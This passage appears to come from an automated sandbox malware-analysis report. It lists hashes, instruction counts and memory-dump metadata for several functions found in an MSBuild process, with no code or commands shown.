                                                              • Opcode ID: 10990643c0437e3189e58dd5e22407b6bf9ed4f8648f7bae4cfefb7bb57ed828
                                                              • Instruction ID: 34e20cf8d36e397f1444740cba8c52a226c5d2add3b5a22e0a8c6a287c8d8024
                                                              • Opcode Fuzzy Hash: 10990643c0437e3189e58dd5e22407b6bf9ed4f8648f7bae4cfefb7bb57ed828
                                                              • Instruction Fuzzy Hash: B0110830A002548FDB04DF68E88478ABFB1EF89311F14C6A4DC8C5F29BD770A94AC791
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01158F08 Relevance: .0, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c5bb99cdda5f45dfefa89183873b7e0820fa5c54b2271299a1e8bc229dde8525
                                                              • Instruction ID: b95498a6c773a8c517bec10066c39e5876ebdffe0a2141d1a3cec74d882d6dbf
                                                              • Opcode Fuzzy Hash: c5bb99cdda5f45dfefa89183873b7e0820fa5c54b2271299a1e8bc229dde8525
                                                              • Instruction Fuzzy Hash: 40018474911258AFCB42FBB8E954ADC7FF5EF51309B0046A9C00A9B269DA312E46CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01157EA8 Relevance: .0, Instructions: 34COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 368dc94d207bb80708c2459d631e78c1294887baad180f64b446d3b1c8d30232
                                                              • Instruction ID: 12882f5f882bc54eb46bd060fa943511377815541f46d0627cdf4c3ed07bdb0a
                                                              • Opcode Fuzzy Hash: 368dc94d207bb80708c2459d631e78c1294887baad180f64b446d3b1c8d30232
                                                              • Instruction Fuzzy Hash: 07F0B235B40214CFC714EB74D598A6D77B2EB88755F6048A8E90ADB3A0DB35AD43CB41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01158F18 Relevance: .0, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4102759487.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_1150000_MSBuild.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 662616c524712dfcf268c57b14bf870d724f2d95e9100d0d4e5bbc66d258f69d
                                                              • Instruction ID: bc41662e22951323e62ccb913564092601842c0cb24bb56b916fca7c47c7f404
                                                              • Opcode Fuzzy Hash: 662616c524712dfcf268c57b14bf870d724f2d95e9100d0d4e5bbc66d258f69d
                                                              • Instruction Fuzzy Hash: 96F08174900218AFCB05FBF8E944A8C77F9EB50309F004A78D00E9B298DA302E458B81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%